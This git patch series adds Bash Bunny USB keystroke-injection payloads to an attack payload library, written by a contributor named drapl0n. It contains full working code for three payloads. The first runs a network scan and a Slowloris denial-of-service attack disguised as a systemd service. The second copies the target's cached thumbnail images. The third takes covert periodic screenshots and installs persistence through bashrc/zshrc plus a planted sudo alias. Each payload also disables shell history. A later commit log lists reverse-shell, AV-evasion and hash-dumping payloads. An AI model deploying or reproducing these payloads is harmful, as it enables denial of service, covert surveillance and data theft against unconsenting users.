From 55d34722fd51dcd7ddb66171de590feea1a79d26 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 8 Apr 2022 19:53:03 +0530 Subject: [PATCH 1/4] uploading bunnyDOS (#509) * uploading bunnyDOS bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and performs DOS on it. * Delete payload.txt * Add files via upload --- payloads/library/execution/bunnyDOS/README.md | 37 +++ .../execution/bunnyDOS/bunnyDOS/payload.sh | 19 ++ .../execution/bunnyDOS/bunnyDOS/systemIO | 222 ++++++++++++++++++ .../library/execution/bunnyDOS/payload.txt | 51 ++++ 4 files changed, 329 insertions(+) create mode 100644 payloads/library/execution/bunnyDOS/README.md create mode 100644 payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh create mode 100644 payloads/library/execution/bunnyDOS/bunnyDOS/systemIO create mode 100644 payloads/library/execution/bunnyDOS/payload.txt diff --git a/payloads/library/execution/bunnyDOS/README.md b/payloads/library/execution/bunnyDOS/README.md new file mode 100644 index 00000000..433d825e --- /dev/null +++ b/payloads/library/execution/bunnyDOS/README.md @@ -0,0 +1,37 @@ +## About: +* Title: bunnyDOS +* Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## bunnyDOS: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and DOS it. Inject payload into multiple systems in network for robust DDOS. + +### Features: +* Auto scan Network. +* Capable for DDOS. +* Persistent. +* Autostart payload on boot. + +### Payload Workflow: +* Stop storing histroy. +* Auto Mounting bunny. +* Transfering payload script. +* Executing script in background and disowning it(this helps to reduce physical access time as network can be large). +* Unmounting bunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| bunnyDOS/ | /payloads/libray/ | + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh new file mode 100644 index 00000000..eeb3f5f8 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh @@ -0,0 +1,19 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}') +open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }') +mkdir /var/tmp/.system/ +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/ +chmod +x /var/tmp/.system/systemIO +for i in $open +do + echo "/var/tmp/.system/./systemIO $i -p 80 -s 500" >> /var/tmp/.system/sysHandler +done +chmod +x /var/tmp/.system/sysHandler +systemctl --user start libSystemIO.service +echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm tmmmp && rm /tmp/payload.sh && exit diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO new file mode 100644 index 00000000..554a5035 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO @@ -0,0 +1,222 @@ +#!/usr/bin/env python3 +import argparse +import logging +import random +import socket +import sys +import time + +parser = argparse.ArgumentParser( + description="Slowloris, low bandwidth stress test tool for websites" +) +parser.add_argument("host", nargs="?", help="Host to perform stress test on") +parser.add_argument( + "-p", "--port", default=80, help="Port of webserver, usually 80", type=int +) +parser.add_argument( + "-s", + "--sockets", + default=150, + help="Number of sockets to use in the test", + type=int, +) +parser.add_argument( + "-v", + "--verbose", + dest="verbose", + action="store_true", + help="Increases logging", +) +parser.add_argument( + "-ua", + "--randuseragents", + dest="randuseragent", + action="store_true", + help="Randomizes user-agents with each request", +) +parser.add_argument( + "-x", + "--useproxy", + dest="useproxy", + action="store_true", + help="Use a SOCKS5 proxy for connecting", +) +parser.add_argument( + "--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host" +) +parser.add_argument( + "--proxy-port", default="8080", help="SOCKS5 proxy port", type=int +) +parser.add_argument( + "--https", + dest="https", + action="store_true", + help="Use HTTPS for the requests", +) +parser.add_argument( + "--sleeptime", + dest="sleeptime", + default=15, + type=int, + help="Time to sleep between each header sent.", +) +parser.set_defaults(verbose=False) +parser.set_defaults(randuseragent=False) +parser.set_defaults(useproxy=False) +parser.set_defaults(https=False) +args = parser.parse_args() + +if len(sys.argv) <= 1: + parser.print_help() + sys.exit(1) + +if not args.host: + print("Host required!") + parser.print_help() + sys.exit(1) + +if args.useproxy: + # Tries to import to external "socks" library + # and monkey patches socket.socket to connect over + # the proxy by default + try: + import socks + + socks.setdefaultproxy( + socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port + ) + socket.socket = socks.socksocket + logging.info("Using SOCKS5 proxy for connecting...") + except ImportError: + logging.error("Socks Proxy Library Not Available!") + +if args.verbose: + logging.basicConfig( + format="[%(asctime)s] %(message)s", + datefmt="%d-%m-%Y %H:%M:%S", + level=logging.DEBUG, + ) +else: + logging.basicConfig( + format="[%(asctime)s] %(message)s", + datefmt="%d-%m-%Y %H:%M:%S", + level=logging.INFO, + ) + + +def send_line(self, line): + line = f"{line}\r\n" + self.send(line.encode("utf-8")) + + +def send_header(self, name, value): + self.send_line(f"{name}: {value}") + + +if args.https: + logging.info("Importing ssl module") + import ssl + + setattr(ssl.SSLSocket, "send_line", send_line) + setattr(ssl.SSLSocket, "send_header", send_header) + +list_of_sockets = [] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +setattr(socket.socket, "send_line", send_line) +setattr(socket.socket, "send_header", send_header) + + +def init_socket(ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if args.https: + ctx = ssl.create_default_context() + s = ctx.wrap_socket(s, server_hostname=args.host) + + s.connect((ip, args.port)) + + s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1") + + ua = user_agents[0] + if args.randuseragent: + ua = random.choice(user_agents) + + s.send_header("User-Agent", ua) + s.send_header("Accept-language", "en-US,en,q=0.5") + return s + + +def main(): + ip = args.host + socket_count = args.sockets + logging.info("Attacking %s with %s sockets.", ip, socket_count) + + logging.info("Creating sockets...") + for _ in range(socket_count): + try: + logging.debug("Creating socket nr %s", _) + s = init_socket(ip) + except socket.error as e: + logging.debug(e) + break + list_of_sockets.append(s) + + while True: + try: + logging.info( + "Sending keep-alive headers... Socket count: %s", + len(list_of_sockets), + ) + for s in list(list_of_sockets): + try: + s.send_header("X-a", random.randint(1, 5000)) + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + logging.debug("Recreating socket...") + try: + s = init_socket(ip) + if s: + list_of_sockets.append(s) + except socket.error as e: + logging.debug(e) + break + logging.debug("Sleeping for %d seconds", args.sleeptime) + time.sleep(args.sleeptime) + + except (KeyboardInterrupt, SystemExit): + logging.info("Stopping Slowloris") + break + + +if __name__ == "__main__": + main() diff --git a/payloads/library/execution/bunnyDOS/payload.txt b/payloads/library/execution/bunnyDOS/payload.txt new file mode 100644 index 00000000..646fe1f0 --- /dev/null +++ b/payloads/library/execution/bunnyDOS/payload.txt @@ -0,0 +1,51 @@ +# Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/bunnyDOS/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH From 46d069c0a9881d3aadd70e864f8cde0f88cbd632 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 8 Apr 2022 19:55:24 +0530 Subject: [PATCH 2/4] uploaded imagesOfYore (#510) * uploaded imagesOfYore imagesOfYore payload steals every image that target ever had in his disk. * Delete payload.txt * uploading imagesOfYore --- .../exfiltration/imagesOfYore/README.md | 38 +++++++++++++++ .../imagesOfYore/imagesOfYore/payload.sh | 9 ++++ .../exfiltration/imagesOfYore/payload.txt | 47 +++++++++++++++++++ 3 files changed, 94 insertions(+) create mode 100644 payloads/library/exfiltration/imagesOfYore/README.md create mode 100644 payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh create mode 100644 payloads/library/exfiltration/imagesOfYore/payload.txt diff --git a/payloads/library/exfiltration/imagesOfYore/README.md b/payloads/library/exfiltration/imagesOfYore/README.md new file mode 100644 index 00000000..f79725bf --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/README.md @@ -0,0 +1,38 @@ +## About: +* Title: imagesOfYore +* Description: imagesOfYore payload steals every image that target ever had in his disk. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltration +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage + +## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk. + +### Features: +* Sotres all images(curently stored on disk and deleted too). +* Extremly fast zstd compression for transfering images. + +### Payload Workflow: +* Stop storing histroy. +* Auto Mounting bunny. +* Transfering payload script. +* Executing script in background and disowning +* Unmounting bunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| imagesOfYore/ | /payloads/libray/ | + +### Note: +* Create directory named `imagesOfYore` in `/loot/` for storing loot. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh new file mode 100644 index 00000000..e77f814c --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh @@ -0,0 +1,9 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails +udisksctl unmount -b /dev/$disk +rm /tmp/script diff --git a/payloads/library/exfiltration/imagesOfYore/payload.txt b/payloads/library/exfiltration/imagesOfYore/payload.txt new file mode 100644 index 00000000..a1d2e914 --- /dev/null +++ b/payloads/library/exfiltration/imagesOfYore/payload.txt @@ -0,0 +1,47 @@ +# Title: imagesOfYore +# Description: imagesOfYore payload steals every image that target ever had in his disk. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script +Q ENTER +Q STRING chmod +x /tmp/script +Q ENTER +Q STRING /tmp/./script \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER +LED FINISH From 614b70bb8fab62bb738c358dd9aad4fe0f6c84da Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 8 Apr 2022 20:01:30 +0530 Subject: [PATCH 3/4] Uploading ScreenGrab (#511) * uploading screenGrab screenGrab payload captures snap shots of target's screen periodically and store them into bunny. * Uploading payload --- .../library/execution/ScreenGrab/README.md | 55 ++++++++++++++++++ .../ScreenGrab/screenGrab/payload.sh | 18 ++++++ .../execution/ScreenGrab/screenGrab/shell | 12 ++++ .../execution/ScreenGrab/screenGrab/systemBus | 5 ++ .../execution/ScreenGrab/switch1/payload.txt | 56 +++++++++++++++++++ .../execution/ScreenGrab/switch2/payload.txt | 43 ++++++++++++++ 6 files changed, 189 insertions(+) create mode 100644 payloads/library/execution/ScreenGrab/README.md create mode 100644 payloads/library/execution/ScreenGrab/screenGrab/payload.sh create mode 100644 payloads/library/execution/ScreenGrab/screenGrab/shell create mode 100644 payloads/library/execution/ScreenGrab/screenGrab/systemBus create mode 100644 payloads/library/execution/ScreenGrab/switch1/payload.txt create mode 100644 payloads/library/execution/ScreenGrab/switch2/payload.txt diff --git a/payloads/library/execution/ScreenGrab/README.md b/payloads/library/execution/ScreenGrab/README.md new file mode 100644 index 00000000..f3503171 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/README.md @@ -0,0 +1,55 @@ +## About: +* Title: screenGrab +* Description: screenGrab payload captures snap shots of target's screen periodically and store them into bunny. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## screenGrab: screenGrab payload is divided into two modules, First capture snap shots and Second stores them in bunny. + +### Features: +* Robust Payload for capturing snap shots of target's screen. +* No additional dependencies required. +* Persistent. +* Autostart payload on boot. + +### Payload: +* Payload is divided into two modules: +1) Deployment: In this stage payload is deployed in targets system. +2) Exfiltration: Storing saved loot from targets system in bunny. + +### Payload Script's Workflow: +* Stop storing histroy. +* Grep bunny's mount point of bunny. +* Creating hidden directory in /var/tmp/..... for obfuscation. +* Copying ffmpeg and snap shot capturing mechanism in target's system. +* Creating systemd service for persistance and triggering mechanism for autostart. + +### Changes to be made: +* Change time interval of capturing snapshots, default time interval is 120 secs. Make changes in `systemBus` on line number `4`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Note: +* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in screenGrab directory. +* Due to big size of binary, it is not provided in this repo. +* Craete directory name `screenGrab` in `/loot/` for storing captured images. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| switch1/payload.txt | /payloads/switch1/ | +| switch2/payload.txt | /payloads/switch2/ | +| screenGrab/ | /payloads/libray/ | + +### Usage: +1. Deploy first payload during absence of target using `switch1`. +2. Execute second payload during absence of target to store captured snapshots in bunny using `switch2`. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh new file mode 100644 index 00000000..ea0ff7a6 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/screenGrab/ffmpeg /var/tmp/.system/ +chmod +x /var/tmp/.system/ffmpeg +mkdir /var/tmp/.system/sysLog +cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +cp -r $mntt/payloads/library/screenGrab/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/execution/ScreenGrab/screenGrab/shell b/payloads/library/execution/ScreenGrab/screenGrab/shell new file mode 100644 index 00000000..2b46e3d3 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/shell @@ -0,0 +1,12 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc +fi diff --git a/payloads/library/execution/ScreenGrab/screenGrab/systemBus b/payloads/library/execution/ScreenGrab/screenGrab/systemBus new file mode 100644 index 00000000..2f0c2b77 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/screenGrab/systemBus @@ -0,0 +1,5 @@ +while true; +do + /var/tmp/.system/./ffmpeg -f x11grab -video_size $(xdpyinfo | grep dimensions | cut -d" " -f7) -i $DISPLAY -vframes 1 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png + sleep 120 +done diff --git a/payloads/library/execution/ScreenGrab/switch1/payload.txt b/payloads/library/execution/ScreenGrab/switch1/payload.txt new file mode 100644 index 00000000..b8fafe1a --- /dev/null +++ b/payloads/library/execution/ScreenGrab/switch1/payload.txt @@ -0,0 +1,56 @@ +# Title: screenGrab +# Description: screenGrab payload captures snap shot's of target's screen periodically. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 12000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/ScreenGrab/switch2/payload.txt b/payloads/library/execution/ScreenGrab/switch2/payload.txt new file mode 100644 index 00000000..06e59f37 --- /dev/null +++ b/payloads/library/execution/ScreenGrab/switch2/payload.txt @@ -0,0 +1,43 @@ +# Title: screenGrab +# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +# create directory named screenGrab in /loot/ +Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER From e11f9281cbb311ed7cff83e0a8c9f32353604227 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 8 Apr 2022 16:43:17 +0200 Subject: [PATCH 4/4] Updated ReadMe (#512) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl * Created ProcDumpBunny Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz * Update README.md * Update payload.txt * Updated ReverseBunny Fixed wrong DELAY commands * Updated PingZhellBunny Fixed wrong DELAY commands * Updated WifiSnatch Fixed multiple mistakes * Uploaded HashDumpBunny Use your BashBunny to dump the user hashes of your target - similar to the msf post-module. The script was obfuscated with multiple layers, so don't be confused. If you don't trust this script, run it within a save testing space - which should be best practice anyways ;) * added example picture * Update README.md * Uploaded SessionBunny Utilize SessionGopher (Slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Afterwards decide which is important and what you want to save onto your BashBunny. * Uploaded SessionBunny Utilize the famous, here slightly modified SessionGopher script, to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Decide which inforamtion you wanna take with you - save it onto your BashBunny! * Update README.md * Delete SessionBunny directory * Uploaded MiniDumpBunny Dump lsass with this rewritten and for BashBunny adapted version of Powersploits Out-MiniDump. * Update README.md added disclaimer * Update README.md * Update README.md --- payloads/library/credentials/HashDumpBunny/README.md | 3 ++- payloads/library/remote_access/ReverseBunny/README.md | 10 +++++----- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/payloads/library/credentials/HashDumpBunny/README.md b/payloads/library/credentials/HashDumpBunny/README.md index f2b9c89a..b1460dd5 100644 --- a/payloads/library/credentials/HashDumpBunny/README.md +++ b/payloads/library/credentials/HashDumpBunny/README.md @@ -9,7 +9,8 @@ Version: 1.0 This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-) # - +**!Depending on your Windows version, this might not work as intended!** +# **Instruction:** Place BunnyDump.bat in the same payload switch-folder as your payload.txt diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 7fced069..5cd530b3 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ 